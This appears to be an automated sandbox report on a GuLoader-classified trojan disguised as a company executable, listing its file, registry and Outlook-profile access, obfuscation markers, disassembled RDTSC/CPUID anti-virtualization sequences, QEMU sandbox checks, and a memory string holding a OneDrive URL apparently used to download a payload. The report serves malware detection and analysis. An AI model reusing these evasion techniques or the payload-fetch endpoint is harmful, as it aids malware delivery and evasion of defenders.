Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File created: C:\Users\user\AppData\Local\Temp\~DF7B66B65AC3863AED.TMP Jump to behavior
Source: KHAWATMI CO.IMPORT & EXPORT.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File read: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: KHAWATMI CO.IMPORT & EXPORT.exe ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe' Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_00407A2B push esp; retf 1_2_00407A2C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1636D push ebp; ret 1_2_03D163AB
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10062 push esi; iretd 1_2_03D1008F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10005 push esi; iretd 1_2_03D1001D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F36 TerminateProcess,LoadLibraryA, 1_2_03D10F36
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FD4 1_2_03D19FD4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FCE 1_2_03D19FCE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FF2 1_2_03D19FF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D111F5 TerminateProcess, 1_2_03D111F5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D135F9 1_2_03D135F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10BEC NtWriteVirtualMemory, 1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FEC 1_2_03D19FEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1A18A 1_2_03D1A18A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D8D NtWriteVirtualMemory, 1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F51 TerminateProcess, 1_2_03D10F51
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11546 TerminateProcess, 1_2_03D11546
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1374E 1_2_03D1374E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F77 TerminateProcess, 1_2_03D10F77
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18F7D 1_2_03D18F7D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1131A TerminateProcess, 1_2_03D1131A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D12B1E 1_2_03D12B1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11107 TerminateProcess, 1_2_03D11107
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D39 1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19F3A 1_2_03D19F3A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D134D3 1_2_03D134D3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19E75 1_2_03D19E75
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1347D NtWriteVirtualMemory, 1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1141F TerminateProcess, 1_2_03D1141F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D13827 1_2_03D13827
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=7B0580AA0B18AE44&RESID=7B0580AA0B18AE44%21106&AUTHKEY=ANQAOZGBUZCFLEEWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
